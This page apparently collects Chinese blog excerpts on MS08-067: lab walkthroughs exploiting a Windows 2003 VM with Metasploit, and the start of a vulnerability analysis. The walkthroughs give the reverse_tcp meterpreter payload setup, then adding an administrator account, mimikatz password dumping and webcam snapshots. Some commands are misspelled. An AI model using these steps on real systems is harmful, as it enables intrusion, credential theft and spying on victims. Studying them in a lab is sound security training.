ms08-067

Ms08-067 漏洞利用

六月ゝ 毕业季﹏ 提交于 2020-03-03 00:37:13
MS08-067漏洞原理: MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行(Remote Code Execution)。 下面我们开始进行实践 前提:靶机有Ms08-067漏洞,攻击机有metasploit工 具 实验工具:windows2003虚拟机,kali虚拟机(建议安装英文 版) 第一步:利用漏洞进入靶机shell界面 1.开启kali虚拟机,并开启metasploit工具 开启如下: 2.查看本机ip地址与靶机ip地址,检查连通性 3.在msf中,查找ms08-067漏洞,并利用该漏洞 4.使用show options 命令查看配置,然后配置RHOST(靶机IP 地址),LHOST(本机 IP 地址),LPORT(本地端口),因为该漏洞利 用的是445端口,所以RPORT(靶机端口)不用配置。 6.配置完成后,使用search windows/mete命令(模糊查询)查询 payload,如下: 使用payload,如下: 7

ms08-067漏洞

淺唱寂寞╮ 提交于 2020-01-07 23:37:28
# ms08-067漏洞攻击 实验过程 1.通过命令: ipconfig 、 ifconfig 确认攻击机和靶机在同一网段 2.通过ping命令确认靶机存活。 3.通过命令: msfconsole 启用msf。 4.攻击。 1.搜索漏洞,命令: search ms08-067 。 2.设置攻击机地址,命令: set lhost ip地址 3.设置攻击机端口,命令: set lport 端口号 4.设置靶机地址,命令: set rhost ip地址 5.加载攻击载荷,命令: set payload windows/meterpreter/reverse_tcp 。 6.进行攻击: exploit/run 5.获得靶机权限。 6.后渗透利用 1.查看权限 命令: gituid 2.进入shell 3.添加用户账号 命令: net 用户名 密码 /add 4.提权: net localgroup administrators 用户名 /add 5.远程登录 命令: rdesktop IP 6.查看无操作时间 命令: idletime 7.获取账户密码 命令: meterpreter> load mimikatz meterpreter> msv meterpreter> wdigest 8.查看网络摄像头列表 命令: wencam_list 9.拍照 命令: wencam_snap 10

ms08-067

纵饮孤独 提交于 2020-01-07 18:14:50
# ms08-067漏洞攻击 1.通过命令: ipconfig 、 ifconfig 确认攻击机和靶机在同一网段 2.通过ping命令确认靶机存活。 3.通过命令: msfconsole 启用msf。 4.攻击。 1.搜索漏洞,命令: search ms08-067 。 2.设置攻击机地址,命令: set lhost ip地址 3.设置攻击机端口,命令: set lport 端口号 4.设置靶机地址,命令: set rhost ip地址 5.加载攻击载荷,命令: set payload windows/meterpreter/reverse_tcp 。 6.进行攻击: exploit/run 5.获得靶机权限。 6.后渗透利用 1.查看权限 命令: gituid 2.进入shell 3.添加用户账号 命令: net 用户名 密码 /add 4.提权: net localgroup administrators 用户名 /add 5.远程登录 命令: rdesktop IP 6.查看无操作时间 命令: idletime 7.获取账户密码 命令: meterpreter> load mimikatz meterpreter> msv meterpreter> wdigest 8.查看网络摄像头列表 命令: wencam_list 9.拍照 命令: wencam_snap 10.抓取视频

0day 安全 之 MS08-067漏洞分析

百般思念 提交于 2019-11-27 16:21:48
这这个漏洞也是根据 0day这本书写的 这本书前面的 异常 还有 C++虚函数 感觉看的还行 也就没有必要发到博客里面 里面的demo 也是很有趣的 然后后面就直接复现漏洞 中间的东西感觉看的还行了 不过我在查阅资料 百度的时候 发现网上能讲清楚这个漏洞的很少。 大家基本上都是拿MSF 直接用框架去打 缺没有从底层认真分析这个漏洞 我在这里分析一波,,,如果哪里不对 还请指教 。。。 这里 这个漏洞还是出现在了 netapi.dll 这里的漏洞点是 出现在了 目录的合并 这里可以看 0day书上的描述 这里我们这个函数就是在ms06 那个漏洞里面的那个CanonicalizePathName函数的子函数 然后这个函数里面东西 我都注释了 哪里不对 还请指教 可以参考0day 书的描述 漏洞点应该就是出现在了 我们那个向左搜索的那个过程了 这里 0day 给了一个demo 我们看一下 #include "stdafx.h" #include <windows.h> #include <stdio.h> typedef int (__stdcall *MYPROC) (LPWSTR, LPWSTR, DWORD,LPWSTR, LPDWORD,DWORD); int main(int argc, char* argv[]) { WCHAR path[256]; WCHAR can